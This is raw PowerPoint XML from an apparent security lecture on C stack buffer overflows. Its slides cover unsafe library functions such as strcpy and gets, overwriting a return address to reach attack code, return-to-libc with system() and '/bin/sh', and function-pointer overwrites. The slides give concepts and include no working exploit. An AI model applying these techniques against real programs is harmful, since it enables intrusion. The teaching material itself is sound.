          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10249" name="AutoShape 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12D16B92-DF0A-3E44-8018-C402A6CE9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7733" y="2721597"/>
            <a:ext cx="1447800" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 74072"/>
              <a:gd name="adj2" fmla="val -21762"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000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US" altLang="ja-JP"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Attacker-controlled memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="14416" name="Group 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB28AA54-F8B4-C14E-84AD-A858B5CBE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333721"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6545264" y="1584761"/>
          <a:ext cx="2881313" cy="4754880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2881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5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val1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val2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5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5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arg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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uments       (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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funcp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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5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return address</a:t>
                      </a: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5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S</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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aved </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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F</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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rame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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P</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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ointer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5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pointer var       (ptr)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5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buffer               (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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5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5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281" name="Title 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AEB3A39-19C5-E74E-BC5F-2D625EFD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Stack Corruption: General View</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1974189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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A16DFF-2ED4-F348-9EB8-3B0B59B5E8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Cause: No Range Checking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EFE20987-23FA-9844-B6CE-0449390072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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> check input size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>, str) simply copies memory contents into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> starting from *str until “\0” is encountered, ignoring the size of the area allocated to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" strike="sngStrike" dirty="0"/>
              <a:t>Many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> all C library functions are unsafe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>, const char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src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dirty="0" err="1"/>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>, const char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src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dirty="0"/>
              <a:t>gets(char *s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(const char *format, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(const char *format, …) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1254887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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1313BB10-A233-914B-AC99-C4C346DB1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801" y="3573463"/>
            <a:ext cx="2879725" cy="431800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16436" name="Group 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB61A64F-D996-3D4C-B478-20FC442AC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462451"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6527801" y="1557338"/>
          <a:ext cx="2881313" cy="4470400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2881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args                  (funcp)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return address</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr horzOverflow="overflow">
                    <a:lnL w="762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PFP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pointer var       (ptr)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buffer               (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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1295" name="Rectangle 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34E6D500-4288-8B40-A383-ADC31B51B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2349500"/>
            <a:ext cx="1800225" cy="792164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ja-JP" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Attack code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14368" name="AutoShape 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{455B5B96-EE7B-2140-8238-8B49ED32F56E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="11266" idx="1"/>
            <a:endCxn id="11295" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="3179765" y="2349501"/>
            <a:ext cx="3348037" cy="1439863"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36558"/>
              <a:gd name="adj2" fmla="val 115877"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63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33" name="Text Box 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E78AD57-5000-724B-AF74-8DFB926B9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594" y="3829051"/>
            <a:ext cx="4994275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Font typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="circleNumDbPlain"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Change the return address to point to the attack code. After the function returns, control is transferred to the attack code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="circleNumDbPlain"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… or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>:</a:t>
            </a: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 use existing instructions in the code segment such as system(), exec(), etc. as the attack code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11298" name="Text Box 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B3D970C-6FF5-FF47-8BD6-A80B04078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1" y="3352801"/>
            <a:ext cx="358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ja-JP">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16437" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE4E366C-9CAA-FA47-B9F1-E20D09F84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1" y="1828801"/>
            <a:ext cx="2676525" cy="923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FontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>② set stack pointers to return to a dangerous library function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16438" name="Text Box 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3808C832-75C0-A945-B8A9-8797F458E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1" y="2781300"/>
            <a:ext cx="1116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ja-JP" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>“/bin/sh”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16439" name="Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3465754D-20CA-D940-95EC-E35F097C8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1988" y="3573464"/>
            <a:ext cx="1116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ja-JP" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16440" name="Line 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA3B0BC9-CC84-FF49-9DAC-5BBE8F4BA8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64650" y="2924175"/>
            <a:ext cx="287338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6441" name="Line 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7AE970A-FD00-E54E-98F8-9513716646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64650" y="3789363"/>
            <a:ext cx="287338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304" name="Text Box 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5657EA33-95A8-BA41-B57F-A68A5F802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1175" y="3141664"/>
            <a:ext cx="4333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AutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11305" name="Title 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6502EC4-9BDB-724D-B512-5ECFDC3CE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Attack #1: Return Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364555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37" grpId="0" animBg="1"/>
      <p:bldP spid="16438" grpId="0"/>
      <p:bldP spid="164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3F5C8F5D-3988-624D-A413-DAEA00AF6F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011362"/>
            <a:ext cx="8458200" cy="10493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400" dirty="0"/>
              <a:t>C uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function pointers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>for callbacks: if pointer to F is stored in memory location P, then another function G can call F as (*P)(…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13317" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D5C3E5-DEF4-4D4A-AE6D-E3F2FE42F8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4221163"/>
            <a:ext cx="6705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13318" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F9E294D-F596-894C-8337-2A650AC09E5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4906963"/>
            <a:ext cx="6705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13319" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A7CCC4A-3F86-4E4B-BC35-72ABF76F9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4221163"/>
            <a:ext cx="3048000" cy="685800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endParaRPr lang="en-US" altLang="en-US" sz="16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320" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{188A43D4-9553-6447-A5AE-95BE0D92B859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5029200" y="2544763"/>
            <a:ext cx="152400" cy="3048000"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 166667"/>
              <a:gd name="adj2" fmla="val 49995"/>
            </a:avLst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1600">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1490952" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BBDE8C6-8EC6-B342-85D1-97B4410A6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4297363"/>
            <a:ext cx="2908300" cy="533400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attack code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13322" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758C9671-7836-5A47-85BE-D36FBAC55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397251"/>
            <a:ext cx="2696572" cy="535531"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69292"/>
              <a:gd name="adj2" fmla="val -3731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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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Buffer with attacker-supplied </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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input string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13323" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A223D6A9-BC96-7D43-B159-5AB3D0F5F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1" y="4221163"/>
            <a:ext cx="892175" cy="685800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endParaRPr lang="en-US" altLang="en-US" sz="16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324" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD48156E-79C0-474F-A638-E25455943253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7037388" y="3675063"/>
            <a:ext cx="152400" cy="815975"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 44618"/>
              <a:gd name="adj2" fmla="val 49995"/>
            </a:avLst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1600">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13325" name="AutoShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E14E06-C2F3-B740-951A-275E943AD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1" y="3397251"/>
            <a:ext cx="927433" cy="535531"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69292"/>
              <a:gd name="adj2" fmla="val -3731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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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Callback</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1490958" name="Freeform 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EFC9841-6B0F-7544-8C39-C98B8711A08C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7124701" y="4772025"/>
            <a:ext cx="1787525" cy="673100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1126"/>
              <a:gd name="T1" fmla="*/ 0 h 424"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1126"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 424"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1126"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 424"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 1126"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 424"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1126"/>
              <a:gd name="T13" fmla="*/ 0 h 424"/>
              <a:gd name="T14" fmla="*/ 1126 w 1126"/>
              <a:gd name="T15" fmla="*/ 424 h 4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26" h="424">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1126" y="238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1125" y="424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13327" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D17B7A96-A535-3E44-8C97-79A489DA7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5454650"/>
            <a:ext cx="2209800" cy="381000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Legitimate function F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C614838F-AA07-AF4B-9879-9075A95FFDB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3676650" y="4297364"/>
            <a:ext cx="3921125" cy="771525"/>
            <a:chOff x="1356" y="2583"/>
            <a:chExt cx="2470" cy="486"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13330" name="Rectangle 17" descr="Large checker board">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51B6C395-A614-3640-9C17-61AA0AF42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583"/>
              <a:ext cx="562" cy="33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overflow</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13331" name="Freeform 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{992AC123-B518-0B42-9D75-3344ADABE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6" y="2832"/>
              <a:ext cx="1956" cy="237"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1956 w 1956"/>
                <a:gd name="T1" fmla="*/ 0 h 237"/>
                <a:gd name="T2" fmla="*/ 1953 w 1956"/>
                <a:gd name="T3" fmla="*/ 237 h 237"/>
                <a:gd name="T4" fmla="*/ 0 w 1956"/>
                <a:gd name="T5" fmla="*/ 237 h 237"/>
                <a:gd name="T6" fmla="*/ 0 w 1956"/>
                <a:gd name="T7" fmla="*/ 87 h 2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56"/>
                <a:gd name="T13" fmla="*/ 0 h 237"/>
                <a:gd name="T14" fmla="*/ 1956 w 1956"/>
                <a:gd name="T15" fmla="*/ 237 h 2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56" h="237">
                  <a:moveTo>
                    <a:pt x="1956" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1953" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="87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none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600"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13329" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
